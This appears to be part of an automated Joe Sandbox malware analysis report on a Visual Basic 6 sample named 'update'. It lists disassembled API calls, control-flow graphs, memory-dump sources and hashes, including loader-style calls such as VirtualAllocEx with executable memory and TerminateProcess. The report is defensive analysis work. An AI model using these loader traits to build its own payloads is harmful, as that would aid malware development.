                                                                                                            • __vbaStrMove.MSVBVM60(3FC7F000,00000000,3FFFE000,00000000,7FFFE000,00000000,7FFF8000,00000000,7FFF0000,00000000,7FFC0000,00000000,7FF80000,00000000,7FF00000,00000000), ref: 0047A2D2
                                                                                                            • __vbaStrCat.MSVBVM60(3F83F000,00000000,3FC7F000,00000000,3FFFE000,00000000,7FFFE000,00000000,7FFF8000,00000000,7FFF0000,00000000,7FFC0000,00000000,7FF80000,00000000), ref: 0047A2DD
                                                                                                            • __vbaStrMove.MSVBVM60(3F83F000,00000000,3FC7F000,00000000,3FFFE000,00000000,7FFFE000,00000000,7FFF8000,00000000,7FFF0000,00000000,7FFC0000,00000000,7FF80000,00000000), ref: 0047A2EA
                                                                                                            • __vbaStrCat.MSVBVM60(1F83F000,00000000,3F83F000,00000000,3FC7F000,00000000,3FFFE000,00000000,7FFFE000,00000000,7FFF8000,00000000,7FFF0000,00000000,7FFC0000,00000000), ref: 0047A2F5
                                                                                                            • __vbaStrMove.MSVBVM60(1F83F000,00000000,3F83F000,00000000,3FC7F000,00000000,3FFFE000,00000000,7FFFE000,00000000,7FFF8000,00000000,7FFF0000,00000000,7FFC0000,00000000), ref: 0047A302
                                                                                                            • __vbaStrCat.MSVBVM60(1F83E000,00000000,1F83F000,00000000,3F83F000,00000000,3FC7F000,00000000,3FFFE000,00000000,7FFFE000,00000000,7FFF8000,00000000,7FFF0000,00000000), ref: 0047A30D
                                                                                                            • __vbaStrMove.MSVBVM60(1F83E000,00000000,1F83F000,00000000,3F83F000,00000000,3FC7F000,00000000,3FFFE000,00000000,7FFFE000,00000000,7FFF8000,00000000,7FFF0000,00000000), ref: 0047A31A
                                                                                                            • __vbaStrCat.MSVBVM60(0FC7E000,00000000,1F83E000,00000000,1F83F000,00000000,3F83F000,00000000,3FC7F000,00000000,3FFFE000,00000000,7FFFE000,00000000,7FFF8000,00000000), ref: 0047A325
                                                                                                            • __vbaStrMove.MSVBVM60(0FC7E000,00000000,1F83E000,00000000,1F83F000,00000000,3F83F000,00000000,3FC7F000,00000000,3FFFE000,00000000,7FFFE000,00000000,7FFF8000,00000000), ref: 0047A332
                                                                                                            • __vbaStrCat.MSVBVM60(07FFC000,00000000,0FC7E000,00000000,1F83E000,00000000,1F83F000,00000000,3F83F000,00000000,3FC7F000,00000000,3FFFE000,00000000,7FFFE000,00000000), ref: 0047A33D
                                                                                                            • __vbaStrMove.MSVBVM60(07FFC000,00000000,0FC7E000,00000000,1F83E000,00000000,1F83F000,00000000,3F83F000,00000000,3FC7F000,00000000,3FFFE000,00000000,7FFFE000,00000000), ref: 0047A34A
                                                                                                            • __vbaStrCat.MSVBVM60(07FFC000,00000000,07FFC000,00000000,0FC7E000,00000000,1F83E000,00000000,1F83F000,00000000,3F83F000,00000000,3FC7F000,00000000,3FFFE000,00000000), ref: 0047A355
                                                                                                            • __vbaStrMove.MSVBVM60(07FFC000,00000000,07FFC000,00000000,0FC7E000,00000000,1F83E000,00000000,1F83F000,00000000,3F83F000,00000000,3FC7F000,00000000,3FFFE000,00000000), ref: 0047A362
                                                                                                            • __vbaStrCat.MSVBVM60(01FF8000,00000000,07FFC000,00000000,07FFC000,00000000,0FC7E000,00000000,1F83E000,00000000,1F83F000,00000000,3F83F000,00000000,3FC7F000,00000000), ref: 0047A36D
                                                                                                            • __vbaStrMove.MSVBVM60(01FF8000,00000000,07FFC000,00000000,07FFC000,00000000,0FC7E000,00000000,1F83E000,00000000,1F83F000,00000000,3F83F000,00000000,3FC7F000,00000000), ref: 0047A37A
                                                                                                            • __vbaStrCat.MSVBVM60(00FF0000,00000000,01FF8000,00000000,07FFC000,00000000,07FFC000,00000000,0FC7E000,00000000,1F83E000,00000000,1F83F000,00000000,3F83F000,00000000), ref: 0047A385
                                                                                                            • __vbaStrMove.MSVBVM60(00FF0000,00000000,01FF8000,00000000,07FFC000,00000000,07FFC000,00000000,0FC7E000,00000000,1F83E000,00000000,1F83F000,00000000,3F83F000,00000000), ref: 0047A392
                                                                                                            • __vbaStrCat.MSVBVM60(003C0000,00000000,00FF0000,00000000,01FF8000,00000000,07FFC000,00000000,07FFC000,00000000,0FC7E000,00000000,1F83E000,00000000,1F83F000,00000000), ref: 0047A39D
                                                                                                            • __vbaStrMove.MSVBVM60(003C0000,00000000,00FF0000,00000000,01FF8000,00000000,07FFC000,00000000,07FFC000,00000000,0FC7E000,00000000,1F83E000,00000000,1F83F000,00000000), ref: 0047A3AA
                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000,003C0000,00000000,00FF0000,00000000,01FF8000,00000000,07FFC000,00000000,07FFC000,00000000,0FC7E000,00000000,1F83E000,00000000), ref: 0047A3B5
                                                                                                            • __vbaStrMove.MSVBVM60(00000000,00000000,003C0000,00000000,00FF0000,00000000,01FF8000,00000000,07FFC000,00000000,07FFC000,00000000,0FC7E000,00000000,1F83E000,00000000), ref: 0047A3C2
                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000,00000000,00000000,003C0000,00000000,00FF0000,00000000,01FF8000,00000000,07FFC000,00000000,07FFC000,00000000,0FC7E000,00000000), ref: 0047A3CD
                                                                                                            • __vbaVarMove.MSVBVM60 ref: 0047A3EE
                                                                                                            • __vbaFreeStrList.MSVBVM60(0000001E,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0047A4C7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2170437571.0000000000473000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2170325166.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2170437571.0000000000401000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2170437571.0000000000405000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2171316457.000000000047E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2171558209.000000000047F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_update.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __vba$Move$Construct2$ChkstkFreeList
                                                                                                            • String ID: 00000000$0003C000$003C0000$003F0000$00FE0000$00FF0000$01FF8000$07F80000$07FFC000$0EFC0000$0FC7E000$0FF00000$0qi@$1F83E000$1F83F000$1FE00000$1FF00000$3F83F000$3FC7F000$3FE00000$3FF00000$3FFFE000$7FF00000$7FF80000$7FFC0000$7FFF0000$7FFF8000$7FFFE000$Ringgold
                                                                                                            • API String ID: 3612664920-3556444298
                                                                                                            • Opcode ID: 646b37513f125d8357db4f01b98df3dd53cddfe7662f98f9e5883d6921ed7a9e
                                                                                                            • Instruction ID: 043d8869fb7924a9ffa8075201c01d0cc86939739d25015000107c4a6852ca59
                                                                                                            • Opcode Fuzzy Hash: 646b37513f125d8357db4f01b98df3dd53cddfe7662f98f9e5883d6921ed7a9e
                                                                                                            • Instruction Fuzzy Hash: 56A20571D0021C9FDB65EB59D884BEEB7B4EB09304F5081EAE50EF6290DB785E808F59

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • __vbaChkstk.MSVBVM60(?,004011C6), ref: 0047C831
                                                                                                            • #660.MSVBVM60(?,00004002,0000000A,00000001,00000001), ref: 0047C877
                                                                                                            • __vbaStrI2.MSVBVM60(?,?,?,?,?,00004002,0000000A,00000001,00000001), ref: 0047C893
                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,?,00004002,0000000A,00000001,00000001), ref: 0047C89D
                                                                                                            • #713.MSVBVM60(00000000,?,?,?,?,?,00004002,0000000A,00000001,00000001), ref: 0047C8A3
                                                                                                            • __vbaVarCat.MSVBVM60(?,00000008,?,00000000,?,?,?,?,?,00004002,0000000A,00000001,00000001), ref: 0047C8CA
                                                                                                            • __vbaVarCat.MSVBVM60(?,00000008,00000000,?,00000008,?,00000000,?,?,?,?,?,00004002,0000000A,00000001,00000001), ref: 0047C8DE
                                                                                                            • __vbaStrVarMove.MSVBVM60(00000000,?,00000008,00000000,?,00000008,?,00000000,?,?,?,?,?,00004002,0000000A,00000001), ref: 0047C8E4
                                                                                                            • __vbaStrMove.MSVBVM60(00000000,?,00000008,00000000,?,00000008,?,00000000,?,?,?,?,?,00004002,0000000A,00000001), ref: 0047C8F0
                                                                                                            • __vbaFreeStr.MSVBVM60(00000000,?,00000008,00000000,?,00000008,?,00000000,?,?,?,?,?,00004002,0000000A,00000001), ref: 0047C8F8
                                                                                                            • __vbaFreeVarList.MSVBVM60(00000005,0000000A,?,?,00000008,?,00000000,?,00000008,00000000,?,00000008,?,00000000,?), ref: 0047C91C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2170437571.0000000000473000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2170325166.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2170437571.0000000000401000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2170437571.0000000000405000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2171316457.000000000047E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2171558209.000000000047F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_update.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __vba$Move$Free$#660#713ChkstkList
                                                                                                            • String ID: 0G
                                                                                                            • API String ID: 3935290791-2664342302
                                                                                                            • Opcode ID: 0aa0686f79abd09be149acfbcca061a62bbebb157487eae6a51f809d2a1ac308
                                                                                                            • Instruction ID: b29a9b2e3f59e7b05f1f6244066e45640ab7f7c590b5d1677ce9beea26c87249
                                                                                                            • Opcode Fuzzy Hash: 0aa0686f79abd09be149acfbcca061a62bbebb157487eae6a51f809d2a1ac308
                                                                                                            • Instruction Fuzzy Hash: F831CCB290021CAADB11DBD5CD45FDEB7BCAB08704F1041AFB609F7191EB785A448F65

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 123 7a013f-7a0163 call 7a1180 SetErrorMode * 2 126 7a0169-7a016c 123->126 127 7a02a0-7a2913 call 7a02ad call 7a05e4 123->127 128 7a2932-7a2938 call 7a0171 126->128 127->128 134 7a293b-7a293c 128->134 135 7a2987 128->135 137 7a293e-7a293f 134->137 138 7a29b2 134->138 135->138 140 7a29b3 137->140 141 7a2941-7a294a call 7a02b9 137->141 138->140 144 7a2a8b-7a2a91 call 7a143d 140->144 154 7a294d 141->154 155 7a2990 141->155 152 7a2a93 144->152 153 7a2ae5-7a2afa 144->153 156 7a2b0b-7a2b2e call 7a0583 152->156 157 7a2a96-7a2aa1 152->157 153->156 158 7a294f 154->158 159 7a29c1 154->159 161 7a29a3 155->161 162 7a29c0 158->162 163 7a2951 158->163 159->144 161->162 162->159 163->161 165 7a2953-7a295f call 7a0443 163->165 174 7a2961-7a2972 165->174 175 7a29b7 165->175 177 7a29c8 174->177 178 7a2974-7a297d 174->178 175->177 177->144 178->144
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNELBASE(00000800), ref: 007A0150
                                                                                                            • SetErrorMode.KERNELBASE(00000000), ref: 007A0158
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2179763704.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7a0000_update.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorMode
                                                                                                            • String ID: ickCount$ntdll$user32
                                                                                                            • API String ID: 2340568224-1695552900
                                                                                                            • Opcode ID: 721004d147152d0a27ac1c869d3963f0680eca72000240b2e14cdee869dbce50
                                                                                                            • Instruction ID: f975af0e37841b97e1bb94d779d4da58a31fb9201bf64a909e727bb78527b11d
                                                                                                            • Opcode Fuzzy Hash: 721004d147152d0a27ac1c869d3963f0680eca72000240b2e14cdee869dbce50
                                                                                                            • Instruction Fuzzy Hash: D6112731804184DFCF266A6C851A7EB2725BBD3B11F188B45F85229067EA3C6E035E9A

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 182 7a018f-7a0283 call 7a1180 185 7a0289-7a029e VirtualAllocEx 182->185 185->185 186 7a02a0-7a2938 call 7a02ad call 7a05e4 call 7a0171 185->186 199 7a293b-7a293c 186->199 200 7a2987 186->200 201 7a293e-7a293f 199->201 202 7a29b2 199->202 200->202 203 7a29b3 201->203 204 7a2941-7a294a call 7a02b9 201->204 202->203 206 7a2a8b-7a2a91 call 7a143d 203->206 213 7a294d 204->213 214 7a2990 204->214 211 7a2a93 206->211 212 7a2ae5-7a2afa 206->212 215 7a2b0b-7a2b2e call 7a0583 211->215 216 7a2a96-7a2aa1 211->216 212->215 217 7a294f 213->217 218 7a29c1 213->218 220 7a29a3 214->220 221 7a29c0 217->221 222 7a2951 217->222 218->206 220->221 221->218 222->220 224 7a2953-7a295f call 7a0443 222->224 233 7a2961-7a2972 224->233 234 7a29b7 224->234 236 7a29c8 233->236 237 7a2974-7a297d 233->237 234->236 236->206 237->206
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNELBASE(000000FF,00000000,04000000,00003000,00000040,00000000), ref: 007A029A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2179763704.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7a0000_update.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID: Pj@h$ntdll$user32
                                                                                                            • API String ID: 4275171209-2607519978
                                                                                                            • Opcode ID: afdf6a697b35bef0c0c238a92b7529aa9e73b9c10f96be1c31dc7a72d546a252
                                                                                                            • Instruction ID: 5547a5dd43cdf565982bdafa423866fb47db93abac6d69ebb097275410a7b013
                                                                                                            • Opcode Fuzzy Hash: afdf6a697b35bef0c0c238a92b7529aa9e73b9c10f96be1c31dc7a72d546a252
                                                                                                            • Instruction Fuzzy Hash: 04F02720588384EDEB315B744C167AA2F509F83720F148B56A4D0990C6D93CA8075B98

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 241 7a231f-7a242b 242 7a2439-7a245b VirtualAllocEx 241->242 243 7a242d-7a2438 241->243 245 7a3279-7a3284 call 7a2460 242->245 243->242
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNELBASE(000000FF,00000000,?,00003000,00000004,007A075E,007A3274), ref: 007A2449
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2179763704.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7a0000_update.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID: Hrw.
                                                                                                            • API String ID: 4275171209-2486825230
                                                                                                            • Opcode ID: 0661ded0db80fc2c3938ef5cd021da6bf71590ffc0b1c3290cc8fe0ecf141f03
                                                                                                            • Instruction ID: 88d4295c329143be5fca5323843af3c909fe7bb5cb68c52274eb4df0efc6e2ac
                                                                                                            • Opcode Fuzzy Hash: 0661ded0db80fc2c3938ef5cd021da6bf71590ffc0b1c3290cc8fe0ecf141f03
                                                                                                            • Instruction Fuzzy Hash: FDE06DF28493C49FDF224F144C817C83B20BB5F355F140286EE988A1D3E2340A12CB25

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 249 401384-4013a4 #100 250 4013a6-4013ba 249->250 251 4013d8-4013df 249->251 252 401413-401433 250->252 253 4013bc-4013c4 250->253 251->252 254 401435-40144f 252->254 253->254 255 4013c6-4013d6 253->255 255->251
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2170437571.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2170325166.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2170437571.0000000000405000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2170437571.0000000000473000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2171316457.000000000047E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2171558209.000000000047F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_update.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: #100
                                                                                                            • String ID: VB5!6&*
                                                                                                            • API String ID: 1341478452-3593831657
                                                                                                            • Opcode ID: 5cebee13d27c711ce7531bc596d2c120d1e82caa7e5e7f560811fe0d957fd77b
                                                                                                            • Instruction ID: a4405d05c6d921bf92d427b85d1f5b3976f2d93f360c910af246fde9c25d79b5
                                                                                                            • Opcode Fuzzy Hash: 5cebee13d27c711ce7531bc596d2c120d1e82caa7e5e7f560811fe0d957fd77b
                                                                                                            • Instruction Fuzzy Hash: 5B21661158E3E24FC71357B458665957FB09D1322071E00EBC4C1DF1E3D26C189ACBA7

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 300 7a1636-7a1779 call 7a1180 304 7a177f-7a1799 300->304 306 7a179f-7a17aa 304->306 307 7a18c3-7a18ca 304->307 306->307 310 7a17b0-7a17b5 306->310 308 7a1b3c-7a1b44 TerminateProcess 307->308 309 7a18d0 307->309 311 7a18d5 309->311 312 7a18d0 call 7a1b24 309->312 313 7a17bb-7a17c0 310->313 314 7a19f0-7a1a42 call 7a1ad1 call 7a1b24 310->314 311->304 312->311 316 7a1b46-7a30b6 call 7a1b4e call 7a1ab8 call 7a242f 313->316 317 7a17c6-7a18be 313->317 331 7a1a7f 314->331 332 7a1a44-7a1a73 314->332 322 7a1aec-7a1b03 317->322 322->311 331->311 331->322 336 7a1a75 332->336 336->331
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2179763704.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7a0000_update.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5c4ff744610ffa4ec0db8190893f91943998d0b49ea24ce80f6cec964d75e599
                                                                                                            • Instruction ID: 18d6f369d087ecce7e1eb3edc7053c837105ec849e14c51b131f2021219b2105
                                                                                                            • Opcode Fuzzy Hash: 5c4ff744610ffa4ec0db8190893f91943998d0b49ea24ce80f6cec964d75e599
                                                                                                            • Instruction Fuzzy Hash: C941AD70204245EFFB29DF28CC99BDAB7A2FF8A340F508325F51D9B591C738A9508B64

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 368 7a0757-7a084d call 7a22fe 372 7a1b3c-7a1b44 TerminateProcess 368->372 373 7a0853-7a085f call 7a26ad 368->373 373->372 376 7a320c 373->376 377 7a3211-7a3253 call 7a22c8 call 7a228a call 7a0617 376->377 378 7a320c call 7a0864 376->378 378->377
                                                                                                            APIs
                                                                                                            • TerminateProcess.KERNELBASE(000000FF,00000000,007A3274), ref: 007A1B40
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2179763704.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7a0000_update.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProcessTerminate
                                                                                                            • String ID:
                                                                                                            • API String ID: 560597551-0
                                                                                                            • Opcode ID: 406a286ddef4e3a109202e0a072aeabd196abeb517e3dbc35692a8f3e0fd9fb4
                                                                                                            • Instruction ID: cf506e6e874a21cae07d59258bc43937df8ce104730d8dc253b3a9c35515a851
                                                                                                            • Opcode Fuzzy Hash: 406a286ddef4e3a109202e0a072aeabd196abeb517e3dbc35692a8f3e0fd9fb4
                                                                                                            • Instruction Fuzzy Hash: A4F098A180E3859FDB476B7848597583FA06F93354F160783F461DA4E3E92CCC4A8766

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 393 7a1b28-7a1b37 394 7a1b3a-7a1b44 TerminateProcess 393->394 395 7a1b39 393->395 395->394
                                                                                                            APIs
                                                                                                            • TerminateProcess.KERNELBASE(000000FF,00000000,007A3274), ref: 007A1B40
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2179763704.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7a0000_update.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProcessTerminate
                                                                                                            • String ID:
                                                                                                            • API String ID: 560597551-0
                                                                                                            • Opcode ID: 70a9c7429159008ca5cd0aa7f8df2603c9f3f12f56bb60d4a04b83138df95abe
                                                                                                            • Instruction ID: 1cd6c2da55158a00caece86dad8b90335dc9b298defec99c1bbe1f2a2f1a311c
                                                                                                            • Opcode Fuzzy Hash: 70a9c7429159008ca5cd0aa7f8df2603c9f3f12f56bb60d4a04b83138df95abe
                                                                                                            • Instruction Fuzzy Hash: 00D0C7B1744241DFC74746749C187C837D15F63275F6D0292A411CF0E1F1584D495721
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2170437571.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2170325166.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2170437571.0000000000405000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2170437571.0000000000473000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2171316457.000000000047E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2171558209.000000000047F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_update.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ec97693484dce48c4a46e5ddbc8b85db1d919ab594382422590c935519ed3a1e
                                                                                                            • Instruction ID: 5297107db6e640558cb187cfc8d5ce4b9db26268a4d803ea067a2b7477cfab88
                                                                                                            • Opcode Fuzzy Hash: ec97693484dce48c4a46e5ddbc8b85db1d919ab594382422590c935519ed3a1e
                                                                                                            • Instruction Fuzzy Hash: 97B012103841429AFB1062A44EC182921C092493C43640C73F401F61E0C778CE80C23D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2179763704.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7a0000_update.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: t2z
                                                                                                            • API String ID: 0-4045002189
                                                                                                            • Opcode ID: cd599c19d52778a046d6c3891ce2b1f72821155114e94882081ef629cbceb089
                                                                                                            • Instruction ID: 567d09c22aae5dd6e51df6d511297d3d48f6f1309e6693794f6d065422beaa26
                                                                                                            • Opcode Fuzzy Hash: cd599c19d52778a046d6c3891ce2b1f72821155114e94882081ef629cbceb089
                                                                                                            • Instruction Fuzzy Hash: AB017C71608181CFDB15DF18C0D0B297760FBAF321F21816EEA465B266E638AC43CA50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2179763704.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7a0000_update.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 2706961497-0
                                                                                                            • Opcode ID: e3b8e84a79b10a85b8f547b7f664c7e2aeb465dfe6dca36fbef0aa5ca0ecb379
                                                                                                            • Instruction ID: d32c7df20e1dcd3ac152874d32fe16848dcea662363ab79f5ede0684224e50ce
                                                                                                            • Opcode Fuzzy Hash: e3b8e84a79b10a85b8f547b7f664c7e2aeb465dfe6dca36fbef0aa5ca0ecb379
                                                                                                            • Instruction Fuzzy Hash: F35167759443818FEF25CF28C4D5726FB90EB93324F44D399D6A68E2D6C2798882C726
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2179763704.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7a0000_update.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: af68b8877f71b6090b4145641b897d1e4f7d71ce21d0f350f00a555af201af40
                                                                                                            • Instruction ID: 193f5952210e58d0ad0b378a28152f784ffc12560c27280903f2caa4d17e5db5
                                                                                                            • Opcode Fuzzy Hash: af68b8877f71b6090b4145641b897d1e4f7d71ce21d0f350f00a555af201af40
                                                                                                            • Instruction Fuzzy Hash: F2D067787852808FEB51CB98DCD0B903390AB99750FC950B4D5458BB96D19C9891D611
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2179763704.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7a0000_update.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
                                                                                                            • Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
                                                                                                            • Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
                                                                                                            • Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10
                                                                                                            APIs
                                                                                                            • __vbaChkstk.MSVBVM60(?,004011C6), ref: 0047C988
                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,?,004011C6), ref: 0047C9A0
                                                                                                            • #521.MSVBVM60(?,?,?,?,?,004011C6), ref: 0047C9A8
                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,?,004011C6), ref: 0047C9B2
                                                                                                            • #517.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004011C6), ref: 0047C9D0
                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004011C6), ref: 0047C9DA
                                                                                                            • __vbaCyMul.MSVBVM60(?,?,A2007B50,0000000F,?,?,?,?,?,?,?,?), ref: 0047C9EC
                                                                                                            • #632.MSVBVM60(?,?,00000001,00000002), ref: 0047CA1C
                                                                                                            • __vbaVarMove.MSVBVM60(?,?,00000001,00000002), ref: 0047CA2A
                                                                                                            • __vbaFreeVar.MSVBVM60(?,?,00000001,00000002), ref: 0047CA35
                                                                                                            • #519.MSVBVM60(?,?,?,00000001,00000002), ref: 0047CA3D
                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,00000001,00000002), ref: 0047CA47
                                                                                                            • #589.MSVBVM60(00000001,?,?,?,00000001,00000002), ref: 0047CA4E
                                                                                                            • __vbaFreeStr.MSVBVM60(0047CAC0,00000001,?,?,?,00000001,00000002), ref: 0047CA7A
                                                                                                            • __vbaFreeStr.MSVBVM60(0047CAC0,00000001,?,?,?,00000001,00000002), ref: 0047CA82
                                                                                                            • __vbaFreeStr.MSVBVM60(0047CAC0,00000001,?,?,?,00000001,00000002), ref: 0047CA8A
                                                                                                            • __vbaFreeStr.MSVBVM60(0047CAC0,00000001,?,?,?,00000001,00000002), ref: 0047CA92
                                                                                                            • __vbaFreeStr.MSVBVM60(0047CAC0,00000001,?,?,?,00000001,00000002), ref: 0047CA9A
                                                                                                            • __vbaFreeVar.MSVBVM60(0047CAC0,00000001,?,?,?,00000001,00000002), ref: 0047CAA2
                                                                                                            • __vbaFreeVar.MSVBVM60(0047CAC0,00000001,?,?,?,00000001,00000002), ref: 0047CAAA
